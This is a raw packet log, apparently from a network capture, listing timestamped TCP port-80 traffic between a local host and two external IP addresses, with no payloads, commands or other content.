                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.105293036 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.105329990 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.106149912 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.106189013 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.106201887 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.106213093 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.106247902 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.106290102 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.106326103 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.107538939 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.107572079 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.107610941 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.107649088 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.108987093 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.109024048 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.109153986 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.109165907 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.109183073 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.109199047 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.109214067 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.110178947 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.110230923 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.110348940 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.110388994 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.111536026 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.111572027 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.111634016 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.111669064 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.112095118 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.112132072 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.112267017 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.112862110 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.112894058 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.112927914 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.112962008 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.114161968 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.114197969 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.114267111 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.114301920 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.115092993 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.115128994 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.115261078 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.115540028 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.115576029 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.115751982 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.115788937 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.116875887 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.116915941 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.116976023 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.117012024 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.118050098 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.118087053 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.118163109 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.118174076 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.118182898 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.118210077 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.118227959 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.119496107 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.119534016 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.119837046 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.119873047 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.120820999 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.120865107 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.120942116 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.120979071 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.121020079 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.121036053 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.121057034 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.122145891 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.122180939 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.122318983 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.122353077 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.123481035 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.123522043 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.123559952 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.123596907 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.124030113 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.124080896 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.124133110 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.124856949 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.124892950 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.124934912 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.124969006 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.127089024 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.127099991 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.127135992 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.127213955 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.127258062 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.128496885 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.129981995 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.130021095 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.130166054 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.130202055 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.130345106 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.130378008 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.130533934 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.130569935 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.131580114 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.131589890 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.131603003 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.131613970 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.131619930 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.131630898 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.131660938 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.132879019 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.132916927 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.132958889 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.132994890 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.134248018 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.134287119 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.134402990 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.134438038 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.135463953 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.135509968 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.135544062 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.135574102 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.136764050 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.136802912 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.136953115 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.136986971 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.138248920 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.138258934 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.138293982 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.139409065 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.139450073 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.139514923 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.139548063 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.140872955 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.140924931 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.140980005 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.141010046 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.142163992 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.142210960 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.142219067 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.142252922 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.143527985 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.143564939 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.143641949 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.143676996 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.145073891 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.145111084 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.145216942 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.145251989 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.146331072 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.146373987 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.146434069 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.146466970 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.147655964 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.147696972 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.147762060 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.147798061 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.148732901 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.148777008 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.148902893 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.148942947 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.179231882 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.227554083 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.227622986 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.227679968 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.228652000 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.228732109 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.228768110 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.231103897 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.232021093 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.232067108 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.232136011 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.234528065 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.234579086 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.234647036 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.237020016 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.237076044 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.237119913 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.239407063 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.239453077 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.239494085 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.241799116 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.241842031 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.241914988 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.244198084 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.244240046 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.244247913 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.246495962 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.246507883 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.246542931 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.248765945 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.248825073 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.248826981 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.248838902 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.248929977 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.248980045 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.248980999 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.249516964 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.249577999 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.249602079 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.249644041 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.250821114 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.250873089 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.250910044 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.250952005 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.250988007 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.251024008 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.251045942 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.252140999 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.252187967 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.253209114 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.253253937 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.253318071 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.255419016 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.255456924 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.255500078 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.257620096 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.257667065 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.257716894 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.259820938 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.259860039 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.259870052 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.262013912 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.262052059 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.262063980 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.264234066 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.264271975 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.264379025 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.266457081 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.266494036 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.266590118 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.268688917 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.268731117 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.268790007 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.270889997 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.270940065 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.270946026 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.273051023 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.273092985 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.273155928 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.275255919 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.275305033 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.275377035 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.277487040 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.277533054 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.277602911 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.279679060 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.279741049 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.279762983 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.281898022 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.281940937 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.282165051 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.284071922 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.284123898 CET4980380192.168.2.434.116.198.130
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.284163952 CET804980334.116.198.130192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.285353899 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.285404921 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.285454035 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.285495996 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.285981894 CET8049802185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.286027908 CET4980280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:26.286075115 CET8049802185.215.113.16192.168.2.4
